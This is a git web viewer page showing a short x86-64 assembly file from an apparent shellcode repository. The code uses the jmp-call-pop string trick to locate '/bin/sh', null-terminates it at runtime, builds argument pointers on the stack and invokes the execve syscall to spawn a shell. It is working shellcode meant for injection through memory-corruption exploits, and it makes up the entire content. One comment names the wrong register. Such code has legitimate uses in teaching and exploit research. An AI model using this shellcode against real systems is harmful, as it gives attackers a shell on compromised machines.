aboutsummaryrefslogtreecommitdiff
path: root/shellcode/execve_x64.asm
blob: 6048796efea622708b9348328e2c5115ee3ccb06 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
BITS 64


; do the 'string trick'
jmp short string

code:
xor		rax,rax
pop		rdi		; pop the addr of the string intro esi (stack pointer register)
mov byte	[rdi + 7], al	; null-terminate the string
push		rdi
mov		rsi,rsp
push		rax
mov		rdx,rsp
mov byte	al,59		; execv
syscall

string:
call code
db '/bin/sh' , 0xFF